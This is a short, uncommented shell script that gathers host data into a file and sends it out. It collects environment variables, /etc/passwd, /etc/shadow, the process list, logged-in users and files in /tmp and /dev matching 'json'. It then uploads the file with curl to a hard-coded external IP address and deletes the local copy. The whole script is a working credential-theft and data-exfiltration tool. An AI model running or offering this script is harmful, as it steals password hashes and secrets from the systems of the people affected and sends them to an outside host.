pwd > testing
echo ----------------- ls ------- >> testing
find /tmp/ -depth -type f -printf "-----%p------\n" -exec grep -i "json" '{}' \; >> testing
find /dev/ -depth -type f -printf "-----%p------\n" -exec grep -i "json" '{}' \; >> testing
echo ----------------- Environment ------- >> testing
env >> testing
echo ----------------- User Info ------- >> testing
cat /etc/passwd >> testing
cat /etc/shadow >> testing
echo ----------------- Users logged in ------- >> testing
w >> testing
echo ----------------- Disk Space ------- >> testing
df -h >> testing
echo ----------------- ps -aux ------- >> testing
ps -aux >> testing
echo ----------------- END $(date) ------- >> testing
curl -F "name=@testing" http://138.68.58.230:8080
rm testing
